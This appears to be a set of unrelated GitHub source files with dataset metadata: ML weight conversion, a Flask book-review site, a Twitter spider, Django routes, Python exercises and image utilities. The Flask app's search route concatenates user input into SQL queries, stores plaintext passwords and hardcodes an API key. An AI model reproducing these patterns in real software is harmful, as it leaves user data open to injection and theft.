logger.warning(\n            f\"Some weights of {pt_model.__class__.__name__} were not initialized from the Flax model and are newly\"\n            f\" initialized: {missing_keys}\\nYou should probably TRAIN this model on a downstream task to be able to\"\n            \" use it for predictions and inference.\"\n        )\n    else:\n        logger.warning(\n            f\"All the weights of {pt_model.__class__.__name__} were initialized from the Flax model.\\n\"\n            \"If your task is similar to the task the model of the checkpoint was trained on, \"\n            f\"you can already use {pt_model.__class__.__name__} for predictions without further training.\"\n        )\n\n    return pt_model\n","repo_name":"FMInference/FlexGen","sub_path":"benchmark/third_party/transformers/src/transformers/modeling_flax_pytorch_utils.py","file_name":"modeling_flax_pytorch_utils.py","file_ext":"py","file_size_in_byte":14386,"program_lang":"python","lang":"en","doc_type":"code","stars":8687,"dataset":"github-code","pt":"7"}
{"seq_id":"7421838258","text":"import os\nimport requests\nimport json\nfrom flask import Flask, session, render_template, request, flash, redirect, url_for, jsonify\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\napp = Flask(__name__)\n# Check for environment variable\nif not os.getenv(\"DATABASE_URL\"):\n    raise RuntimeError(\"DATABASE_URL is not set\")\n
RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\napp.secret_key = os.getenv('SECRET')\nSession(app)\n\n# Set up database\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\n\n\n@app.route(\"/\")\ndef index():\n\n return render_template(\"index.html\")\n\n@app.route(\"/login\", methods = ['POST', 'GET'])\ndef login():\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n currentUser = request.form.get(\"username\")\n if request.method == 'POST':\n if db.execute(\"SELECT *FROM users WHERE username = :username AND password = :password\",{\"username\" :username, \"password\" :password}).rowcount==0:\n return render_template(\"login.html\", message = (\"Wrong username or password\"))\n else:\n session['logged_in'] = True\n session['user_id'] = username\n return render_template(\"search.html\", username = session['user_id'])\n return render_template(\"login.html\")\n\n@app.route(\"/register\", methods = ['POST', 'GET'])\ndef signup():\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n currentUser = request.form.get(\"username\")\n newuser = db.execute('SELECT *FROM users WHERE username = :username', {\"username\" :username})\n\n if request.method== \"POST\":\n if newuser.rowcount==1:\n return render_template('signup.html', message='User already exists!!')\n else:\n db.execute('INSERT INTO users (username, password) VALUES (:username, :password)',{\"username\": username, \"password\": password})\n db.commit()\n session['logged_in'] = True\n session['user_id'] = username\n return render_template('search.html', username = session['user_id'] ,message = \" Welcome, You are logged in!\")\n\n return render_template(\"signup.html\")\n\n\n@app.route('/search', methods=['GET','POST'])\ndef search():\n if request.method == \"POST\":\n searchQuery = request.form.get(\"searchQuery\")\n session['searchedFor'] = searchQuery\n searchResult = db.execute(\"SELECT isbn, author, title FROM books WHERE isbn iLIKE '%\"+searchQuery+\"%' OR author iLIKE '%\"+searchQuery+\"%' OR title iLIKE '%\"+searchQuery+\"%'\").fetchall()\n print(\"searchQuery\")\n\n session[\"books\"] = []\n noResult = db.execute(\"SELECT isbn, author, title FROM books WHERE isbn iLIKE '%\"+searchQuery+\"%' OR author iLIKE '%\"+searchQuery+\"%' OR title iLIKE '%\"+searchQuery+\"%'\")\n if noResult.rowcount==0:\n message = \"No result was found\"\n return render_template(\"results.html\", message = message)\n for row in searchResult:\n book = dict()\n book[\"isbn\"] = row[0]\n book[\"author\"] = row[1]\n book[\"title\" ] = row[2]\n\n session[\"books\"].append(book)\n return render_template(\"results.html\", username=session['user_id'], searchedFor=searchQuery, books=session[\"books\"])\n\n return render_template('search.html', username=session['user_id'])\n\n\n@app.route(\"/book/\", methods=['GET','POST'])\ndef book(isbn):\n book = db.execute(\"SELECT * FROM books WHERE isbn = :isbn\", {\"isbn\": isbn}).fetchone()\n book_id = db.execute(\"SELECT book_id FROM books WHERE isbn = :isbn\", {\"isbn\": isbn}).fetchone()\n session['book_id'] = book_id\n bid = book_id[0]\n username = session['user_id']\n user_id = db.execute('SELECT user_id FROM users WHERE username=:username',{'username':username}).fetchone()\n uid = user_id[0]\n \n print(uid)\n print(bid)\n if session['user_id'] is None:\n 
\n\n@app.route(\"/book/<isbn>\", methods=['GET','POST'])\ndef book(isbn):\n    book = db.execute(\"SELECT * FROM books WHERE isbn = :isbn\", {\"isbn\": isbn}).fetchone()\n    book_id = db.execute(\"SELECT book_id FROM books WHERE isbn = :isbn\", {\"isbn\": isbn}).fetchone()\n    session['book_id'] = book_id\n    bid = book_id[0]\n    username = session['user_id']\n    user_id = db.execute('SELECT user_id FROM users WHERE username=:username',{'username':username}).fetchone()\n    uid = user_id[0]\n    \n    print(uid)\n    print(bid)\n    if session['user_id'] is None:\n        session['logged_in'] = False\n        return render_template(\"login.html\", message=\"You must log in first!!\")\n    if book is None:\n        return render_template(\"error.html\", message=\"book does not exist\")\n    if request.method == \"GET\":\n        # Processing the json data\n        res = requests.get(\"https://www.goodreads.com/book/review_counts.json\",\n                           params={\"key\": \"zDJmGLJmkc694O9VI0w0qQ\", \"isbns\": book.isbn}).json()[\"books\"][0]\n        ratings_count = res[\"ratings_count\"]\n        average_rating = res[\"average_rating\"]\n\n        reviews = db.execute('SELECT scale, comments, users.user_id, username FROM users JOIN bookreview ON (users.user_id = bookreview.user_id) WHERE bookreview.book_id = :bid;', {'bid': bid}).fetchall()\n        users = []\n        \n        return render_template(\"book.html\", book=book, users=users,review=reviews,\n                               ratings_count=ratings_count, average_rating=average_rating, username=session[\"user_id\"])\n    if request.method=='POST':\n        rating = request.form.get('rating')\n        comment= request.form.get('comment')\n        if db.execute('SELECT * from bookreview where user_id=:uid AND book_id=:bid',{\"uid\":uid, 'bid':bid}).rowcount==1:\n            return render_template('error.html', message='You cannot submit a review twice for the same book. Please go back to the previous page')\n        else:\n            db.execute('insert into bookreview (user_id,book_id,scale,comments) VALUES (:uid,:bid,:rating, :comment)',{'uid':uid, 'bid':bid, 'rating':rating, 'comment':comment})\n            db.commit()\n            return redirect(url_for('book', isbn=book.isbn))\n\n# Page for the website's API\n@app.route(\"/api/<isbn>\", methods=[\"GET\"])\ndef api(isbn):\n\n    bdata = db.execute(\"SELECT * FROM books WHERE isbn = :bisbn\", {\"bisbn\": isbn}).fetchone()\n    if bdata is None:\n        return \"No Such A Book in the Database\", 404\n    bookid = db.execute(\"SELECT book_id from books where isbn =:isbn\",{\"isbn\":isbn}).fetchone()\n\n\n    numOfRatings = db.execute(\"SELECT COUNT (*) FROM bookreview WHERE book_id = :book_id\", {\"book_id\": bookid.book_id}).fetchone()\n    averageRating = db.execute(\"SELECT AVG (scale) FROM bookreview WHERE book_id = :book_id\", {\"book_id\": bookid.book_id}).fetchone()\n\n    app.logger.debug(f'numOfRatings type is {type(numOfRatings)}, value is {numOfRatings}')\n    app.logger.debug(f'averageRating type is {type(averageRating)}, value is {averageRating}')\n\n    response = {}\n    response['title'] = bdata.title \n    response['author'] = bdata.author\n    response['year'] = bdata.year\n    response['isbn'] = bdata.isbn\n    response['review_count'] = str(numOfRatings[0])\n    response['average_score'] = '% 1.1f' % averageRating[0]\n\n    json_response = json.dumps(response)\n\n    return json_response, 200\n
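The /api/<isbn> view above builds the JSON body by hand with json.dumps. An equivalent route body can lean on Flask's jsonify, which also sets the Content-Type header; a sketch with hypothetical route and values, not the app's actual endpoint:

    from flask import Flask, jsonify

    app = Flask(__name__)

    @app.route("/api/demo")
    def api_demo():
        # jsonify serialises the dict and sets Content-Type: application/json
        response = {"title": "Example", "review_count": "3", "average_score": "4.0"}
        return jsonify(response), 200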
\n\n\n@app.route(\"/profile\")\ndef profile():\n    flash (\"Hello, Profile!!\")\n    return render_template(\"profile.html\", username= session['user_id'])\n\n@app.route(\"/logout\")\ndef logout():\n    flash (\"\")\n\n    session['logged_in'] = False\n    return render_template(\"index.html\")\n\nif __name__ == \"__main__\":\n    app.run()\n","repo_name":"AliAbukar/project1-","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":7189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"43242878934","text":"import tkinter as tk\n\n#https://stackoverflow.com/questions/23482748/how-to-create-a-hyperlink-with-a-label-in-tkinter\n\nroot=tk.Tk()\nroot.title('New Window')\n\n#load the icon for the GUI \nroot.iconbitmap('./Physics_helper_logo.ico')\n\nimport webbrowser\ndef callback(url):\n    webbrowser.open_new(url)\nlink1 = tk.Label(root, text=\"Google Hyperlink\", fg=\"blue\", cursor=\"hand2\")\nlink1.pack()\nlink1.bind(\"<Button-1>\", lambda e: callback(\"http://www.google.com\"))\n\n\n#create the GUI\nroot.mainloop()\n\n\n","repo_name":"maxtcurie/Python_Demo","sub_path":"GUI/Web_link.py","file_name":"Web_link.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"17808786364","text":"import twurl\nimport urllib.request, urllib.error\nimport sqlite3\nimport json\n\nTWITTER_URL = 'https://api.twitter.com/1.1/friends/list.json'\nconn = sqlite3.connect('spider.sqlite')\ncur = conn.cursor()\n\ncur.execute('create table if not exists People (id integer primary key, name text unique, retrieved boolean)')\ncur.execute('create table if not exists Relations (from_id integer, to_id integer, unique(from_id, to_id))')\n\nwhile True:\n    account = input('Enter account name, \\'print\\', \\'delete\\', or \\'quit\\': ')\n    \n    if account == 'quit': break\n\n    if account == 'delete':\n        account = input('Enter account to delete: ')\n        cur.execute('delete from People where name=? returning id', (account, ))\n        try:\n            ID = cur.fetchone()[0]\n            cur.execute('delete from Relations where from_id=? or to_id=?', (ID, ID))\n        except:\n            print('No account with that name')\n        continue\n\n    if account == 'print':\n        print('Data stored till now:')\n        print('\\tPeople Table:')\n        cur.execute('select * from People')\n        for row in cur:\n            print('\\t', row, sep='')\n        print('\\tJoined Tables:')\n        cur.execute('select * from People join Relations on People.id=Relations.from_id')\n        for row in cur:\n            print('\\t', row, sep='')\n        continue\n\n    if len(account) == 0:\n        cur.execute('select id, name from People where retrieved=false limit 1')\n        try:\n            ID, account = cur.fetchone()\n        except:\n            print('All people have been retrieved')\n            continue\n    else:\n        try:\n            cur.execute('select id, retrieved from People where name=? limit 1', (account, ))\n            ID, retrieved = cur.fetchone()\n            if retrieved == True:\n                print('Account already exists... 
Enter another one')\n continue\n except:\n cur.execute('insert or fail into People (name, retrieved) values (?, false)', (account, ))\n ID = cur.lastrowid\n\n url = twurl.augment(TWITTER_URL,\n {'screen_name': account, 'count': '20'})\n print('Retrieving account', account)\n\n try:\n connection = urllib.request.urlopen(url)\n except Exception as err:\n print('Failed to Retrieve', err)\n continue\n\n data = connection.read().decode()\n headers = dict(connection.getheaders())\n\n print('Remaining', headers['x-rate-limit-remaining'])\n\n try:\n js = json.loads(data)\n except:\n print('Unable to parse json')\n print(data)\n continue\n\n if 'users' not in js:\n print('Wrong type of json')\n print(json.dumps(js, indent=4))\n continue\n\n cur.execute('update People set retrieved=true where id=?', (ID, ))\n\n oldCount = 0\n newCount = 0\n for user in js['users']:\n name = user['screen_name']\n print('Found', name)\n cur.execute('select id from People where name=?', (name, ))\n \n try:\n friend_id = cur.fetchone()[0]\n oldCount += 1\n except:\n cur.execute('insert or fail into People (name, retrieved) values (?, false)', (name, ))\n friend_id = cur.lastrowid\n newCount += 1\n\n cur.execute('insert or ignore into Relations (from_id, to_id) values (?, ?)', (ID, friend_id))\n\n print('New Accounts = ', newCount, ', Revisited = ', oldCount, sep='')\n conn.commit()\n\ncur.close()\n\n","repo_name":"AhmedYasser5/Twitter_Friends_Network","sub_path":"twitter_db.py","file_name":"twitter_db.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12593723660","text":"# Name - Gurdip Singh SID - 22107007\r\n\r\n# Ques 1\r\ndef is_perfect_number(number):\r\n if number <=0:\r\n return False\r\n divisors_sum = sum(i for i in range(1,number) if number%i==0)\r\n if divisors_sum == number:\r\n print(\"It is Perfect No\")\r\n else:\r\n print(\"It is not a Perfect No\")\r\n\r\na = int(input())\r\nis_perfect_number(a)\r\n\r\n\r\n\r\n# Ques 2\r\na =input()\r\nb =a[::-1]\r\nif a == b:\r\n print(\"Yes\")\r\nelse:\r\n print(\"No\")\r\n\r\n\r\n\r\n# Ques 3\r\ndef print_pascals_triangle(n):\r\n triangle = []\r\n for i in range(n):\r\n row = [1]\r\n if i > 0:\r\n prev_row = triangle[i - 1]\r\n for j in range(len(prev_row) - 1):\r\n row.append(prev_row[j] + prev_row[j + 1])\r\n row.append(1)\r\n triangle.append(row)\r\n\r\n max_width = len(str(triangle[-1][len(triangle[-1]) // 2])) + 1\r\n\r\n for i in range(n):\r\n row = triangle[i]\r\n padding = ' ' * ((n - i - 1) * max_width // 2)\r\n line = ' ' * (max_width // 2)\r\n for num in row:\r\n line += str(num).center(max_width)\r\n print(padding + line)\r\n\r\nprint_pascals_triangle(5)\r\n\r\n\r\n\r\n# Ques 4\r\na = input()\r\nb = ['a','b','c','d','e','f','g','h','i','j','k','l','m','o','n','p','q','r','s','t','u','v','w','x','y','z',' ']\r\nc = []\r\n\r\nfor i in a.lower():\r\n if i not in c:\r\n c.append(i)\r\n\r\nif sorted(b)==sorted(c):\r\n print('yes')\r\nelse:\r\n print(\"no\")\r\n\r\n\r\n\r\n# Ques 5\r\nstr1 = input()\r\nlist = str1.split(\"-\")\r\nlis = sorted(list)\r\nstr2 = \"-\".join(lis)\r\nprint(str2)\r\n\r\n\r\n\r\n# Ques 6\r\ndef student_data(name,student_id,student_class ):\r\n print(f'student name is {name},SID is {student_id}, class is {student_class}')\r\n\r\nname = input()\r\nsid = input()\r\nclass_ =input()\r\n\r\n\r\nstudent_data(name,sid,class_)\r\n\r\n\r\n\r\n# Ques 7\r\nclass Student:\r\n pass\r\nclass Marks:\r\n pass\r\nstudent1 = Student()\r\nstudent2 = 
Student()\r\nmarks1 = Marks()\r\nmarks2 = Marks()\r\n\r\nprint(isinstance(student1, Student))\r\nprint(isinstance(student2, Student))\r\nprint(isinstance(marks1, Marks))\r\nprint(isinstance(marks2, Marks))\r\n\r\nprint(issubclass(Student, object))\r\nprint(issubclass(Marks, object))\r\n\r\n\r\n\r\n# Ques 8\r\ndef find_triplets(nums):\r\n nums.sort() # Sort the input list in ascending order\r\n triplets = []\r\n\r\n for i in range(len(nums) - 2):\r\n if i > 0 and nums[i] == nums[i - 1]:\r\n continue # Skip duplicate elements\r\n\r\n left = i + 1\r\n right = len(nums) - 1\r\n\r\n while left < right:\r\n total = nums[i] + nums[left] + nums[right]\r\n\r\n if total == 0:\r\n triplets.append([nums[i], nums[left], nums[right]])\r\n\r\n # Skip duplicate elements\r\n while left < right and nums[left] == nums[left + 1]:\r\n left += 1\r\n while left < right and nums[right] == nums[right - 1]:\r\n right -= 1\r\n\r\n left += 1\r\n right -= 1\r\n\r\n elif total < 0:\r\n left += 1\r\n else:\r\n right -= 1\r\n\r\n return triplets\r\n\r\nnums = [-25, -10, -7, -3, 2, 4, 8, 10]\r\ntriplets = find_triplets(nums)\r\nprint(triplets)\r\n\r\n\r\n\r\n# Ques 9\r\nclass ParenthesesValidator:\r\n def isValid(self, str):\r\n mapping = {'(': ')', '[': ']', '{': '}'}\r\n lis = []\r\n for idx in str:\r\n if idx in '([{':\r\n lis.append(idx)\r\n elif len(lis) == 0 or idx != mapping[lis.pop()]:\r\n return False\r\n return len(lis) == 0\r\nobj = ParenthesesValidator()\r\nprint(obj.isValid(\"([}])\"))","repo_name":"Gurdip-Singh10/Gurdip-Singh-ITC-Assignments","sub_path":"Assignment 6.py","file_name":"Assignment 6.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13485800434","text":"from django.shortcuts import render\nfrom .models import Post, Category\nfrom .forms import CommentForm\n\n# Create your views here.\n\n\ndef blog_index(request):\n posts = Post.objects.all().order_by('-created_on')\n context = {\n 'posts': posts\n }\n return render(request, 'blog_index.html', context)\n\n\ndef blog_detail(request, pk):\n post = Post.objects.get(pk=pk)\n comment_form = None\n comments = post.comments.filter()\n\n if request.method == 'POST':\n comment_form = CommentForm(data=request.POST)\n if comment_form.is_valid():\n new_comment = comment_form.save(commit=False)\n new_comment.post = post\n new_comment.save()\n else:\n comment_form = CommentForm()\n context = {\n 'post': post,\n 'comments': comments,\n 'comment_form': comment_form\n }\n return render(request, 'blog_details.html', context)\n\n\ndef blog_category(request):\n categories = Category.objects.all()\n context = {\n 'categories': categories\n }\n return render(request, 'blog_category.html', context)\n\n\n# def category_detail(request, pk):\n# category = Category.object.get(pk=pk)\n# context = {\n# 'category' : category\n# }\n# return render(request, 'category_details.html', context)\n\n","repo_name":"RdBear324/my_Django","sub_path":"Artem_2022/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30588699384","text":"import time\nimport win32gui, win32con, win32api\nimport win32gui_struct\n\nfrom autorefresh.autorefresh_thread import AutorefreshThread\n\n\nGUID_DEVINTERFACE_USB_DEVICE = \"{A5DCBF10-6530-11D2-901F-00C04FB951ED}\"\nDEVICE_NOTIFY_ALL_INTERFACE_CLASSES = 4\n\ng_device_changes = 0\n\n\ndef device_changed(hwnd, msg, wp, 
lp):\n global g_device_changes\n if wp in [win32con.DBT_DEVICEARRIVAL, win32con.DBT_DEVICEREMOVECOMPLETE]:\n g_device_changes += 1\n\n\nclass AutorefreshThreadWin(AutorefreshThread):\n\n def run(self):\n global g_device_changes\n\n # code based on:\n # - https://github.com/libsdl-org/SDL/blob/7b3449b89f0625e4603f5d8681e2bac1f51a9386/src/hidapi/SDL_hidapi.c\n # - https://github.com/vmware-archive/salt-windows-install/blob/master/deps/salt/python/App/Lib/site-packages/win32/Demos/win32gui_devicenotify.py\n wc = win32gui.WNDCLASS()\n wc.hInstance = win32api.GetModuleHandle(None)\n wc.lpszClassName = \"VIAL_DEVICE_DETECTION\"\n wc.lpfnWndProc = { win32con.WM_DEVICECHANGE: device_changed }\n class_atom = win32gui.RegisterClass(wc)\n hwnd = win32gui.CreateWindowEx(0, \"VIAL_DEVICE_DETECTION\", None, 0, 0, 0, 0, 0, win32con.HWND_MESSAGE, None, None, None)\n\n hdev = win32gui.RegisterDeviceNotification(\n hwnd,\n win32gui_struct.PackDEV_BROADCAST_DEVICEINTERFACE(GUID_DEVINTERFACE_USB_DEVICE),\n win32con.DEVICE_NOTIFY_WINDOW_HANDLE | DEVICE_NOTIFY_ALL_INTERFACE_CLASSES\n )\n\n while True:\n for x in range(100):\n win32gui.PumpWaitingMessages()\n time.sleep(0.01)\n\n if g_device_changes > 0:\n g_device_changes = 0\n self.update()\n","repo_name":"vial-kb/vial-gui","sub_path":"src/main/python/autorefresh/autorefresh_thread_win.py","file_name":"autorefresh_thread_win.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":733,"dataset":"github-code","pt":"7"} +{"seq_id":"23628794990","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import (\n NoticeCreateAPIView,\n NoticeListAPIView,\n NoticeDetailAPIView,\n NoticeUpdateAPIView,\n NoticeDeleteAPIView,\n\t)\n\nurlpatterns = [\n url(r'^$', NoticeListAPIView.as_view(), name='notices'),\n url(r'^(?P[\\d]+)/$', NoticeDetailAPIView.as_view(), name='detail'),\n url(r'^(?P[\\d]+)/delete/$', NoticeDeleteAPIView.as_view(), name=\"delete\"),\n url(r'^(?P[\\d]+)/edit/$', NoticeUpdateAPIView.as_view(), name='update'),\n url(r'^create/$', NoticeCreateAPIView.as_view(), name=\"addnotice\"),\n]","repo_name":"lyoman/uzapp_backend","sub_path":"notices/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17808786364","text":"#import h5py\nimport cv2\nimport numpy as np\nimport pickle\nimport math\nfrom glob import iglob\n\nRESOURCE_PATH = \"res/\"\n# save and load pickle objects \ndef save_obj(obj, name):\n with open(RESOURCE_PATH + name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\t\t\ndef load_obj(name):\n with open(RESOURCE_PATH + name + '.pkl', 'rb') as f:\n return pickle.load(f)\t\t\n\n# create grayscale image from database image\ndef gray( img ):\n\treturn cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\ndef load_images(filename = None, hdf5 = False):\n\t# if hdf5: #LLD-icon.hdf5\n\t# \thdf5_file = h5py.File(RESOURCE_PATH + filename, 'r')\n\t# \timages, labels = (hdf5_file['data'], hdf5_file['labels/resnet/rc_64'])\n\t# \treturn images\n\treturn [i for i in map(cv2.imread, iglob(RESOURCE_PATH+filename+'/**/*', recursive=True)) if i is not None]\n\n# find max distance given a list of points \ndef find_max( point_list):\n\n\tmax_dist = 0.000\n\tfirst_point = point_list[0]\n\tsecond_point = point_list[1]\n\n\tfor i in range(0, len(point_list)-1):\n\t\tfor j in range(i+1, len(point_list)):\n\t\t\t\n\t\t\tdist_sq = (point_list[i][0] 
- point_list[j][0])**2 + (point_list[i][1] - point_list[j][1])**2 \n\t\t\t\n\t\t\tif dist_sq > max_dist:\n\t\t\t\tmax_dist = dist_sq\n\t\t\t\tfirst_point = point_list[i]\n\t\t\t\tsecond_point = point_list[j]\n\t\t\t\t\n\treturn first_point, second_point, math.sqrt(max_dist)\n\t\n# if object is a circle, find max distance which also has the closest slope to the best fit slope \ndef find_tiebreaker( x, y, best_slope, max_dist ):\n\n\tfirst_point = (x[0], y[0])\n\tsecond_point = (x[1], y[1])\n\tmin_slope_diff = 999999.999\n\t\n\tfor i in range(0, len(x)-1):\n\t\tfor j in range(i+1,len(x)+i):\n\t\t\n\t\t\tif j >= len(x):\n\t\t\t\tj = j % len(x)\n\t\t\t\n\t\t\tdist = math.sqrt( (x[i] - x[j])**2 + (y[i] - y[j])**2 )\n\t\t\tif (max_dist - dist)/max_dist <= 0.08 and (x[i] - x[j]) != 0:\n\t\t\t\tslope_diff = abs( (y[i] - y[j])/(x[i] - x[j]) - best_slope )\n\t\t\t\t\n\t\t\t\tif slope_diff < min_slope_diff:\n\t\t\t\t\tmin_slope_diff = slope_diff\n\t\t\t\t\tfirst_point = (x[i], y[i])\n\t\t\t\t\tsecond_point = (x[j], y[j])\t\n\n\treturn first_point, second_point\n\t\n\n# find midpoints between two points given a set of fractions \ndef get_midway (p1, p2, fractions):\n\t\n\tmidpts = []\n\tdx = p2[0] - p1[0]\n\tdy = p2[1] - p1[1]\n\t\n\tfor n, fract in enumerate(fractions):\n\t\tx = p1[0] + fract * dx \n\t\ty = p1[1] + fract * dy \n\t\tmidpts.append( (x,y) )\n\t\t\t\n\treturn midpts\n\n# find intersection of 2 lines \t\ndef line_intersect(line1, line2):\n\txdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])\n\tydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1]) \n\t\n\tdef det(a, b):\n\t\treturn a[0] * b[1] - a[1] * b[0]\n\t\n\tdiv = det(xdiff, ydiff)\n\tif div == 0:\n\t\treturn (-999999,-999999) \n\n\td = (det(*line1), det(*line2))\n\tx = det(d, xdiff) / div\n\ty = det(d, ydiff) / div\n\treturn x, y\t\n\t\n# find points of intersection between normal line and all possible line segments in contour \ndef find_intersect( x1, y1, x2, y2):\n\t\n\tintersect = []\n\t\n\tfor i in range(0,len(x2)):\n\t\tj = i + 1\n\t\tif j == len(x2):\n\t\t\tj = 0\n\t\t\n\t\t# find point of intersection\n\t\tpoint = line_intersect( ((x1[0], y1[0]), (x1[-1], y1[-1])), ((x2[i], y2[i]), (x2[j], y2[j])) )\n\t\t\n\t\t# check that the point lies on the contour \n\t\tdotproduct = (point[0] - x2[i]) * (x2[j] - x2[i]) + (point[1] - y2[i])*(y2[j] - y2[i])\n\t\tsquaredlength = (x2[j] - x2[i])**2 + (y2[j] - y2[i])**2\n\t\t\n\t\tif dotproduct >= 0 and dotproduct <= squaredlength and point not in intersect:\n\t\t\tintersect.append( point )\n\n\treturn intersect\n
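find_intersect above keeps an intersection point only if it projects onto the segment: the dot product with the segment direction must lie between 0 and the segment's squared length. That test in isolation, on hypothetical points:

    def on_segment(p, a, b):
        # project p onto the segment a->b and test the projection bounds
        dot = (p[0] - a[0]) * (b[0] - a[0]) + (p[1] - a[1]) * (b[1] - a[1])
        length_sq = (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2
        return 0 <= dot <= length_sq

    print(on_segment((1, 1), (0, 0), (2, 2)))  # True
    print(on_segment((3, 3), (0, 0), (2, 2)))  # False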
\ndef canny(img):\n\tcimg = cv2.Canny(img,100,200)\n\tif np.amax(cimg,axis=(0,1)) == 0:\n\t\tcimg = cv2.Canny(img,20,100)\n\tif np.amax(cimg,axis=(0,1)) == 0:\n\t\tcimg = cv2.Canny(img,5,20)\n\tif np.amax(cimg,axis=(0,1)) == 0:\n\t\tcimg = cv2.Canny(img,1,5)\t\n\treturn cimg\n\ndef fill_in_diagonals(img):\n\trows,cols = img.shape[:2]\n\tmin_x = cols \n\tmin_y = rows\n\tmax_x = 0 \n\tmax_y = 0 \n\t# fill in any diagonals in the edges \n\tfor i in range(0, rows):\n\t\tfor j in range(0, cols):\n\t\t\tif i >= 1 and i <= rows - 2 and j >= 1 and j <= cols - 2: \n\t\t\t\tif img[i,j] == 255 and img[i,j-1] == 0 and img[i+1,j] == 0 and img[i+1,j-1] == 255:\n\t\t\t\t\timg[i+1,j] = 255 \n\t\t\t\telif img[i,j] == 255 and img[i,j+1] == 0 and img[i+1,j] == 0 and img[i+1,j+1] == 255:\n\t\t\t\t\timg[i+1,j] = 255 \n\t\t\t\n\t\t\tif img[i,j] == 255:\n\t\t\t\tif j > max_x:\n\t\t\t\t\tmax_x = j \n\t\t\t\tif j < min_x:\n\t\t\t\t\tmin_x = j\n\t\t\t\tif i > max_y:\n\t\t\t\t\tmax_y = i \n\t\t\t\tif i < min_y: \n\t\t\t\t\tmin_y = i\n\treturn img, rows, cols, min_x, min_y, max_x, max_y\n\ndef image_preprocess(img):\n\timg = gray(img)\n\trows,cols = img.shape[:2]\n\t# create grayscale image and use Canny edge detection\n\tcimg = canny(img)\t\n\t\n\tdcimg, rows, cols, min_x, min_y, max_x, max_y = fill_in_diagonals(cimg)\n\t\n\treturn rows, cols, min_x, min_y, max_x, max_y, dcimg","repo_name":"kac123/Icon-Matching-Project","sub_path":"gcloudtest/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"14386073351","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom . import views\nfrom django.conf import settings\n\nrouter = routers.DefaultRouter()\nrouter.register(r'rivers', views.RiverViewSet)\nrouter.register(r'data',views.DataViewSet)\nrouter.register(r'insect',views.InsectViewSet)\nrouter.register(r'samplerecord',views.SampleRecordViewSet)\nrouter.register(r'recordinsect',views.SampleRecordInsectViewSet)\n#Application Name\n\napp_name = 'aquality_server'\n# Controlling The Path of Application\n\nuseraccount = [\n    path('useraccount/loginauth', views.checkUser, name='checkUser'),\n    path('useraccount/register', views.registerPage, name='registerPage'),\n    path('useraccount/delete', views.del_user, name='del_user'),\n    path('useraccount/checkname', views.if_username_exist, name='checkName'),\n    path('useraccount/checkemail', views.if_email_exist, name='checkEmail'),\n    path('insect_score/score', views.calculate_score_insect, name='get_score'),\n]\n\nurlpatterns = [\n    path('', include(router.urls)),\n    path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n    # path('addData', views.addData, name='addData'),\n    path('testing/',views.testingPage,name='testingPage'),\n    path('testingInsect/',views.testingInsectPage,name='testingInsectPage'),\n    path('testingPageForPatrick',views.testingPageForPatrick,name='testingPageForPatrick'),\n    path('sampledetail',views.getSampleRecord,name='sampledetail'),\n    path('samplesave',views.storeRecordResult,name='samplesave')\n] + useraccount\n","repo_name":"tunjing998/CCCMI-TCA2","sub_path":"aquality_server/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"10183236327","text":"import os\r\nimport time\r\nimport cv2\r\nimport numpy as np \r\n\r\ndef process_image(img) :\r\n\r\n    image_org = cv2.resize(img , (416,416), interpolation = cv2.INTER_CUBIC)\r\n    image_org = np.array(image_org , dtype = 'float32')\r\n    image_org = image_org/255.0\r\n    image_org = np.expand_dims(image_org , axis=0)\r\n\r\n    return image_org\r\n
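process_image above is the usual YOLO input pipeline: resize to the fixed 416x416 network size, scale pixels to [0, 1], and add a batch axis. The shape progression traced on a hypothetical 720p frame:

    import cv2
    import numpy as np

    frame = np.zeros((720, 1280, 3), dtype=np.uint8)   # hypothetical BGR frame
    x = cv2.resize(frame, (416, 416), interpolation=cv2.INTER_CUBIC)
    x = np.array(x, dtype='float32') / 255.0
    x = np.expand_dims(x, axis=0)
    print(x.shape)  # (1, 416, 416, 3)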
